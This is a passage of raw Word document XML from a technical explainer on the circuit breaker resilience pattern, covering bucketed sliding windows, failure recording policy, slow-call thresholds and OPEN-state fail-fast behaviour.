      <w:r w:rsidRPr="006E6644">
        <w:t>Time buckets (10 second window, 10 buckets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F20CC0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Bucket[0]: {calls: 120, failures: 8, slow: 2, time: T-9s to T-8s}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DFF5AB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Bucket[1]: {calls: 115, failures: 5, slow: 1, time: T-8s to T-7s}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E08BBE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5DE413" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Bucket[9]: {calls: 130, failures: 12, slow: 3, time: T-0s to T (current)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09035D89" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="6127FFD3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Aggregates: sum across all buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E1E30" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  total_calls: 1200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2528FDCB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_count: 85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D0CDE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_rate: 7.08%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14037C5D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Each second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6BBD9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="960"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The oldest bucket (Bucket[0]) is evicted — its counts are subtracted from aggregates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37215949" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="960"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>A new current bucket starts accumulating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B1D1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="960"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The array rotates (new bucket becomes Bucket[9]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4948A1F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why buckets instead of per-call entries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027AAF64" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>At 10,000 calls/second over a 10-second window = 100,000 individual entries. A ring buffer of 100,000 entries requires significant memory and per-call overhead. 10 buckets require minimal memory and O(1) per-call update (just increment the current bucket's counters). The trade-off: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time bucket precision</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> = bucket granularity (1 second). A call from 1.5 seconds ago may be in the same bucket as a call from 0.5 seconds ago — treated as equally "recent." For circuit breaker purposes, this 1-second precision is more than sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A75251" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The time-based window's handling of traffic variability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DAFBE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>During low-traffic periods (1 call/minute), the window contains very few samples — not enough to make statistically meaningful failure rate calculations. Most circuit breaker implementations require a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>minimum call threshold</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> before evaluating the failure rate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1BCCFD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93CBE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If total_calls_in_window &lt; minimum_calls (e.g., 10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0701DCB2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    Do not evaluate failure threshold — stay CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C5DAC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>This prevents the circuit from opening on 1 failure out of 1 call (100% failure rate) when there's no statistical evidence of sustained failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5722747D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Counts as a Failure — The Failure Recording Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDBB38E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Not every non-success response should be recorded as a failure. The circuit breaker's failure recording policy determines which outcomes open the circuit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8427C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Should record as failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5D070" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Network timeouts (the downstream didn't respond within the configured timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A0A71" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Connection refused (the downstream's port is closed — process is down).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F5BE8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>5xx HTTP responses (500 Internal Server Error, 502 Bad Gateway, 503 Service Unavailable, 504 Gateway Timeout) — server-side errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5985E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Specific 4xx responses that indicate system problems rather than client errors: 429 Too Many Requests (the downstream is overloaded), 408 Request Timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E313C2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Should NOT record as failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C79C981" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>4xx client errors (400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found) — these are client-side problems, not downstream service failures. A 404 means the resource doesn't exist, not that the service is failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07340D0B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Business logic errors that the downstream correctly returns — a payment rejection (422 Unprocessable Entity) is not a service failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E514CB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Calls that were not permitted by the circuit breaker itself (OPEN state rejections) — these should be recorded as NOT_PERMITTED, not failures, to avoid inflating the failure count based on the circuit's own rejections rather than actual downstream failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595B999E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ignorable exception list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A213591" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker implementations allow configuring specific exceptions/errors to </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ignore</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> (not count as either success or failure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710B61E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ResourceNotFoundException → record as ignored, not failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372790D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ValidationException → record as ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EB5555" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TimeoutException → record as failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76354237" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ConnectionException → record as failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A3BDA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Ignored calls don't affect the failure rate calculation. They're completely transparent to the circuit breaker's state machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79170E68" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slow Call Detection — The Latency Dimension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490A17F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A service that responds slowly (10 seconds when it normally responds in 100ms) is functionally degraded even if it doesn't fail. Slow calls consume threads/connections for extended periods, causing the same resource exhaustion as failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B904666" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breakers track </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>slow calls</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — calls whose duration exceeds a configurable threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E998EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C0507" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>slow_call_duration_threshold: 2000ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1079A3FB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="25947DC5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Any call taking &gt; 2000ms is recorded as SLOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9C123" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>(it's also recorded as SUCCESS or FAILURE based on its response, but flagged as slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27633C00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slow call rate threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25018F23" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Similar to failure rate threshold, a slow call rate threshold independently triggers circuit opening:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD01F7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A128D1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>failure_rate_threshold: 50%     (open if &gt;50% of calls fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A7835D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>slow_call_rate_threshold: 80%   (open if &gt;80% of calls are slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76674B6B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Either condition independently opens the circuit. A service that's responding slowly on 90% of calls but not failing opens the circuit via the slow call rate threshold — protecting the caller from thread exhaustion even though the downstream is technically "responding."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C53065" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The relationship between slow calls and timeouts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE7B83" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If a call takes 5 seconds and exceeds the slow call threshold (2 seconds) but doesn't exceed the timeout (30 seconds), it's recorded as SLOW + SUCCESS. If it exceeds the timeout (30 seconds), it's recorded as a FAILURE (timeout). The circuit breaker can react to slow-but-not-timed-out calls via the slow call rate threshold — a more proactive protection than waiting for full timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68355549" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="3C82C8CE">
          <v:rect id="_x0000_i4104" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6115C5BB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. The OPEN State — Fail Fast Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F8C93" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Actually Happens During Rejection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D09D9F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When the circuit is OPEN, incoming call attempts are </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not forwarded to the downstream service</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>. Instead, the circuit breaker immediately throws a CallNotPermittedException (or equivalent) — a specific exception type distinct from downstream-caused exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3BBBC5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why a distinct exception type matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F5AB1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Callers can distinguish between:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967283F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CallNotPermittedException → circuit is open → apply fallback immediately, no retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557FBABF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TimeoutException → downstream timed out → may retry with backoff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C24A1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ConnectionException → downstream unreachable → may retry with backoff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885F5E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Treating circuit-breaker rejections the same as downstream failures causes retries against an already-stressed system — the opposite of what the circuit breaker intends. The CallNotPermittedException signals: "don't retry, don't wait, apply your fallback."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26376859" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The NOT_PERMITTED recording:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AAF879" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit breaker records each rejected call as NOT_PERMITTED in its window (separate from FAILURE counts). This serves two purposes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B0123" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The not_permitted_total metric reveals how many calls are being shed. A high rate indicates the circuit is protecting a significantly stressed downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39378AFC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> NOT_PERMITTED calls don't inflate the failure rate — only actual calls to the downstream affect failure/success calculations. This prevents a perverse feedback loop where the circuit's own rejections count as failures, keeping the circuit open indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBB546" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Open Timeout — How Long to Stay Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5FC18" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The open timeout determines how long the circuit waits before transitioning to HALF-OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365115E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too short (e.g., 1 second):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The circuit transitions to HALF-OPEN frequently. If the downstream is still failing, test requests fail, the circuit re-opens, and the cycle repeats rapidly. The downstream receives many test requests during this cycling, providing minimal protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57580529" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too long (e.g., 5 minutes):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The circuit stays open long after the downstream recovers. Users experience extended outages that could have been ended minutes earlier. The system is "too conservative."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAD0B5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The right duration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Typically </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>30–60 seconds</w:t>
